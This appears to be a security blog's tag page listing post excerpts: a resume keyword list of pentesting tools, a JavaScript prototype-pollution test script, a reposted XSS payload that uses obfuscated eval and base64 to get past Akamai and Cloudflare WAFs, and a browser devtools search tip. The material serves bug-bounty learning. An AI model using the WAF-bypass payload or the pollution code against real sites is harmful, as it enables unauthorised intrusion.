Posts

Showing posts with the label OWASP

Keywords - Building Your InfoSec Resume? Here’s What You Should Know (and Learn)

While reviewing over 30 job descriptions for penetration testing and cybersecurity roles, I compiled a list of the most frequently mentioned tools, technologies, and concepts that employers are looking for. If you're updating your resume or preparing for interviews, this list might help you focus your learning and training.

* Important Note: Don’t just add these terms to your resume blindly. Take time to understand how the tools work — even if you haven't administered Tenable Nessus scan templates for two years, you can still download demos, watch tutorials, or run labs to get real experience and speak confidently about the technology.

[*] Top Vulnerability Assessment / Pentesting Tools
Burp Suite (Community or Enterprise)
Tenable Nessus (Check their site — many products)
Qualys
Fortify on Demand (FoD)
WebInspect Enterprise (WIE)
Metasploit
Nmap

[*] Security-Focused Operating Systems
Kali Linux
Parrot OS
Bac...

Global Object Prototype Pollution Report - code in article

(() => {
  const ArrayOfInterestingObjects = ['google', 'gapi', 'gadgets', 'ga'];
  // Malicious payload to test prototype pollution
  const maliciousPayload = JSON.parse('{"__proto__": {"polluted": "XSS!"}}');
  const pollutionResults = [];
  ArrayOfInterestingObjects.forEach((key) => {
    const target = window[key];
    if (!target) {
      console.warn(`window.${key} does not exist.`);
      pollutionResults.push({
        key,
        exists: false,
        polluted: false,
        reason: 'Object does not exist',
      });
      return;
    }
    console.log(`Inspecting window.${key}:`, target);
    try {
      Object.assign(target, maliciousPayload);
      const wasPolluted = {}.polluted === 'XSS!';
      pollut...

Repost from LI - New WAF Bypass Discovered - Akamai & Cloudflare

Just found this on LinkedIn - props go to Amit for the post.

AMIT BHAKAR • Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker

Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥

Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/

A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare.

Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...

How to use any browser to search the DOM (all associated scripts as well) for any keyword

How to easily enumerate your web app (target) for certain keywords:

- Load the target in pretty much any browser, then right-click and choose Inspect.
- Once it is open, go to the Sources tab.
- On the left, make sure "Page" is selected (not Content scripts).
- Right-click "top" (right under the page icon you picked).
- Type in API, for instance, and hit ENTER.

You should see output like the picture below: the browser searches all relevant scripts and info in the source for matches and tells you where it matched those keywords.

Hackertips today